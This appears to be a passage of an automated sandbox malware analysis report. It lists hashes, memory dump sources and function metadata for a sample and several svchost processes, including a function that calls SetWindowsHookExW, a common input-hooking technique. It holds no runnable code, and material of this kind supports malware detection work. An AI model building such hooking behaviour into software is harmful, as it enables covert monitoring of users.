                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5210ec17ad45723e338257a99e598d5a6d8f3921da13e48dae3e4b53cf1ddde3
                                                                                                                                          • Instruction ID: d70777ad208a6052baa4ca936e81eeb2c1b130a2674db8dcd6028a090193f623
                                                                                                                                          • Opcode Fuzzy Hash: 5210ec17ad45723e338257a99e598d5a6d8f3921da13e48dae3e4b53cf1ddde3
                                                                                                                                          • Instruction Fuzzy Hash: 0941F67190DA8A8FE718EB68884A6B97FE0FF66320F04417EE04DC3193DE65A805C7D1

                                                                                                                                          Control-flow Graph

                                                                                                                                          Control-flow graph (rendered graph with executed/not-executed colouring not reproduced): function spanning 7ffaac5b2a18-7ffaac5b2b2d; the block 7ffaac5b2ab2-7ffaac5b2aef calls SetWindowsHookExW, then continues at 7ffaac5b2af1 or 7ffaac5b2af7-7ffaac5b2b28.
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HookWindows
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2559412058-0
                                                                                                                                          • Opcode ID: d93b203a2ff40d093c6570c90b990a7eaedcd1020df5cc810046df7651b406a1
                                                                                                                                          • Instruction ID: bfc31bd37673004a7cf2fa80af0d749af406c160c87aa6efff040e8a11b53eda
                                                                                                                                          • Opcode Fuzzy Hash: d93b203a2ff40d093c6570c90b990a7eaedcd1020df5cc810046df7651b406a1
                                                                                                                                          • Instruction Fuzzy Hash: 8031F73191CA5D8FEB18EB6CD8066F97BE1FB5A321F00427ED04DC3292DE64A85687D1

                                                                                                                                          Control-flow Graph

                                                                                                                                          Control-flow graph (rendered graph with executed/not-executed colouring not reproduced): function spanning 7ffaac5b20a8-7ffaac5b2b2d; the block 7ffaac5b2ab2-7ffaac5b2aef calls SetWindowsHookExW, then continues at 7ffaac5b2af1 or 7ffaac5b2af7-7ffaac5b2b28.
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HookWindows
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2559412058-0
                                                                                                                                          • Opcode ID: 7f43c572f934bd3938388135a39450c1f91f387c2153d4c3b90db7bc4fb25d06
                                                                                                                                          • Instruction ID: ee61fac95253e1df3898bacb2068cdbbbc9a387b7036b9e7c389158a4fdf94ac
                                                                                                                                          • Opcode Fuzzy Hash: 7f43c572f934bd3938388135a39450c1f91f387c2153d4c3b90db7bc4fb25d06
                                                                                                                                          • Instruction Fuzzy Hash: 5C31F77190CA4D8FEB18EB6CD8056B97BE1FB6A311F00417EE04ED3292DE64A80687D1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.3705880352.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffaac5b0000_yF21ypxRB7.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5781f1c383496b3e5015d88fba428071edbe797949de586417751a22807917e3
                                                                                                                                          • Instruction ID: 50ee5ca0400fdedde3d9bd065e639f8fe7e21feb3844b9df794fbe7d857e1ff8
                                                                                                                                          • Opcode Fuzzy Hash: 5781f1c383496b3e5015d88fba428071edbe797949de586417751a22807917e3
                                                                                                                                          • Instruction Fuzzy Hash: 7CC1E73190CB4D8FDB19DBA8D8466E9BBF1EF56320F04826FD049D3292DE74A845CB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5ced447147bfbe9f81786a6dc1da53c218857f3d5cf26e41738d2b53b6ce9aa6
                                                                                                                                          • Instruction ID: f5ed88870b38891ef9342125d529efcc29e6ce8cff20d33ac6bb5a28d423f70e
                                                                                                                                          • Opcode Fuzzy Hash: 5ced447147bfbe9f81786a6dc1da53c218857f3d5cf26e41738d2b53b6ce9aa6
                                                                                                                                          • Instruction Fuzzy Hash: 8822F771B5CA5A4FE798EB7CC4596797BD2FF99300F40897DE04EC3292DE28A8458381
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: P_H
                                                                                                                                          • API String ID: 0-4206272840
                                                                                                                                          • Opcode ID: 649e1c934a629b240c0d0a8da1695792ba382b3d0157833dd8b6cdfe701415fa
                                                                                                                                          • Instruction ID: b73e516b32f62a30d42f0eaaed7ebea4804cc16314c2442655f8b6c44778a7e3
                                                                                                                                          • Opcode Fuzzy Hash: 649e1c934a629b240c0d0a8da1695792ba382b3d0157833dd8b6cdfe701415fa
                                                                                                                                          • Instruction Fuzzy Hash: BE515662A4E6C54FE785A77888646767FD9EF87215B0808FFE08EC71D3DD185846C382
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: P_H
                                                                                                                                          • API String ID: 0-4206272840
                                                                                                                                          • Opcode ID: 557576ddd3e52f851cce65f701e5c4e7b4913b1bf310019d39ca0c094c66dc03
                                                                                                                                          • Instruction ID: 390f8458600d03be80d0378d305c6b9edba9f43e8b517bccf603933b384d5b07
                                                                                                                                          • Opcode Fuzzy Hash: 557576ddd3e52f851cce65f701e5c4e7b4913b1bf310019d39ca0c094c66dc03
                                                                                                                                          • Instruction Fuzzy Hash: C531A462B189490FE798FB7CD45AA79B6C6EB99311F0449BEF04EC3293DD689C418381
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 02f3870b536efbc4ba79acb9052317cffc93fdd87676c09f55f08eab38c09788
                                                                                                                                          • Instruction ID: 34860de3d65e4bb9044036c1ef84b61e2a1f37129f81a5090f61cc0fd6fdf6fd
                                                                                                                                          • Opcode Fuzzy Hash: 02f3870b536efbc4ba79acb9052317cffc93fdd87676c09f55f08eab38c09788
                                                                                                                                          • Instruction Fuzzy Hash: 9E717972A5DA8B4FF785A77CC8555F97BE5EF86210F0444BAE04DC3193DD18AC4A8381
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ae3a1c4e13dc46c5351c5ffe2cb1ca5e1739c0d5902005a1040a1b9fdf70ceab
                                                                                                                                          • Instruction ID: 541854cddb5e04278a8f68ddf085ec2c47e0b50820ecccf3903127e19197bbd7
                                                                                                                                          • Opcode Fuzzy Hash: ae3a1c4e13dc46c5351c5ffe2cb1ca5e1739c0d5902005a1040a1b9fdf70ceab
                                                                                                                                          • Instruction Fuzzy Hash: 0241A471A5CA5A8FEB44EBB8C865AFD7BE1FF98300F508579D009D7292CD38A845C781
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2eb643694192db0a67e1cd9a3c117e92eb5904ea578ccf4e3ff220aa4a9eed78
                                                                                                                                          • Instruction ID: 3d23fac86f60d8bc4da1ac6d3171e8a75c513f41e4e173b9b939a8c657d7075d
                                                                                                                                          • Opcode Fuzzy Hash: 2eb643694192db0a67e1cd9a3c117e92eb5904ea578ccf4e3ff220aa4a9eed78
                                                                                                                                          • Instruction Fuzzy Hash: EF215752B1891A8BFB44B7BC985A7FC72D6FF9C701F108579E00EC3292DD2899424381
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000008.00000002.1415314241.00007FFAAC570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC570000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffaac570000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4044ae6a90e6c1693abf6e457cf09714559a31c865188b7f27062c047abf75bd
                                                                                                                                          • Instruction ID: a3e47201ae9c811484a38dd074985c04d27240f36142699b02dd21f1cd0e35a3
                                                                                                                                          • Opcode Fuzzy Hash: 4044ae6a90e6c1693abf6e457cf09714559a31c865188b7f27062c047abf75bd
                                                                                                                                          • Instruction Fuzzy Hash: 7901F755D4D7A28FF755A72859914727FE0DF96210F0848AEF48CC6193ED04998983C2
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4e1a11f65be4c4cb27277ebd463a9db7ec4c7654d1790926bf175b318437db3a
                                                                                                                                          • Instruction ID: 6ea73cf732a3cdea42ac4cb6f4b9cb35e12f400dafca9fc3237fc2d823ea8b44
                                                                                                                                          • Opcode Fuzzy Hash: 4e1a11f65be4c4cb27277ebd463a9db7ec4c7654d1790926bf175b318437db3a
                                                                                                                                          • Instruction Fuzzy Hash: 28220571B5DA4A8FE798FB38C45967977D2FF89301F448579E04EC32D2DE28A8058781
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: O_H
                                                                                                                                          • API String ID: 0-3989587205
                                                                                                                                          • Opcode ID: 2aa3bf841322c0890f91a6db9f5b1c31f89e8697d011729cfdfae357f9383e51
                                                                                                                                          • Instruction ID: f9b84b5fbd09ed845ef132c0543656e91f53167b0449cd20b32fa42f2ae0c0d1
                                                                                                                                          • Opcode Fuzzy Hash: 2aa3bf841322c0890f91a6db9f5b1c31f89e8697d011729cfdfae357f9383e51
                                                                                                                                          • Instruction Fuzzy Hash: 76513451A5E6C54FE786A77888646767FD9EF87215F0804FEE08EC7293DD188806C382
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: O_H
                                                                                                                                          • API String ID: 0-3989587205
                                                                                                                                          • Opcode ID: 5d637d5fed1edfb6c7a2f2218108a49e3e69e07bbe4c9537d1248fdf400db530
                                                                                                                                          • Instruction ID: 5a2a029eb4ddb643d842d0bf925b29a69f10e269646900ce95518446abea539d
                                                                                                                                          • Opcode Fuzzy Hash: 5d637d5fed1edfb6c7a2f2218108a49e3e69e07bbe4c9537d1248fdf400db530
                                                                                                                                          • Instruction Fuzzy Hash: A931D362B189490FEB88FB3CD45A779B6C6EB99315F1445BEF04EC3293DD689C428380
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 783e452f825721ed6a476e5948d5b30e152ec7f0f74a04f430401b918a6190b0
                                                                                                                                          • Instruction ID: 814aad445af2f8c3762638b4ece7ed1dbe74d74912b5bca4c5ab82719147c1e7
                                                                                                                                          • Opcode Fuzzy Hash: 783e452f825721ed6a476e5948d5b30e152ec7f0f74a04f430401b918a6190b0
                                                                                                                                          • Instruction Fuzzy Hash: 83715932A1DA8A8FF795A738C8556F97BE1EFC6310F0440BAE04DC7193DD18AC4A8391
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.1500795607.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffaac580000_svchost.jbxd